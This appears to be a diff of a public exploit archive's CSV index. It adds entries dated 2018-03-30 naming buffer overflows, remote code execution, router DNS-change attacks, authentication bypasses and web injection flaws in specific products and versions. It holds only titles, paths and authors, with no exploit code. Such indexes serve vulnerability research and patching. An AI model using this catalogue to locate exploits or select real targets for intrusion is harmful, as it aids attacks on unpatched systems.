+44375,exploits/xml/dos/44375.py,"Systematic SitAware - NVG Denial of Service",2018-03-30,2u53,dos,xml,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9620,6 +9622,10 @@ id,file,description,date,author,type,platform,port
 44337,exploits/windows/local/44337.py,"Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)",2018-03-23,"Hashim Jawad",local,windows,
 44341,exploits/windows/local/44341.py,"Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow",2018-03-26,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
 44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows,
+44363,exploits/windows/local/44363.py,"Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH)",2018-03-30,wetw0rk,local,windows,
+44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
+44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
+44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16363,6 +16369,7 @@ id,file,description,date,author,type,platform,port
 44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux,
 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
+44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38675,7 +38682,7 @@ id,file,description,date,author,type,platform,port
 42657,exploits/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,webapps,php,
 42658,exploits/php/webapps/42658.txt,"EduStar Udemy Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,webapps,php,
 42659,exploits/php/webapps/42659.txt,"AirStar Airbnb Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,webapps,php,
-42660,exploits/php/webapps/42660.txt,"osTicket 1.10 - SQL Injection",2017-09-12,"Mehmet Ince",webapps,php,
+42660,exploits/php/webapps/42660.txt,"osTicket 1.10 - SQL Injection (PoC)",2017-09-12,"Mehmet Ince",webapps,php,
 42661,exploits/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",webapps,php,
 42662,exploits/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",webapps,php,
 42663,exploits/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",webapps,php,
@@ -39059,3 +39066,19 @@ id,file,description,date,author,type,platform,port
 44354,exploits/php/webapps/44354.txt,"Open-AuditIT Professional 2.1 - Cross-Site Scripting",2018-03-28,"Nilesh Sapariya",webapps,php,
 44355,exploits/php/webapps/44355.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)",2014-11-03,"Stefan Horst",webapps,php,443
 44358,exploits/php/webapps/44358.rb,"Joomla Component Fields - SQLi Remote Code Execution (Metasploit)",2018-03-29,Metasploit,webapps,php,
+44360,exploits/multiple/webapps/44360.txt,"Open-AuditIT Professional 2.1 - Cross-Site Request Forgery",2018-03-30,"Nilesh Sapariya",webapps,multiple,
+44361,exploits/cgi/webapps/44361.rb,"Homematic CCU2 2.29.23 - Arbitrary File Write",2018-03-30,"Patrick Muench and Gregor Kopf",webapps,cgi,
+44362,exploits/php/webapps/44362.html,"MiniCMS 1.10 - Cross-Site Request Forgery",2018-03-30,zixian,webapps,php,80
+44366,exploits/php/webapps/44366.txt,"WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting",2018-03-30,"Stefan Broeder",webapps,php,80
+44367,exploits/php/webapps/44367.txt,"WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection",2018-03-30,"Stefan Broeder",webapps,php,80
+44368,exploits/cgi/webapps/44368.rb,"Homematic CCU2 2.29.23 - Remote Command Execution",2018-03-30,"Patrick Muench and Gregor Kopf",webapps,cgi,
+44369,exploits/php/webapps/44369.txt,"Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection",2018-03-30,"Sureshbabu Narvaneni",webapps,php,80
+44370,exploits/php/webapps/44370.txt,"Joomla! Component AcySMS 3.5.0 - CSV Macro Injection",2018-03-30,"Sureshbabu Narvaneni",webapps,php,80
+44371,exploits/php/webapps/44371.txt,"WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure",2018-03-30,"Colette Chamberland",webapps,php,80
+44373,exploits/asp/webapps/44373.txt,"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
+44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php,
+44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
+44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php,
+44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
+44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php,
+44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,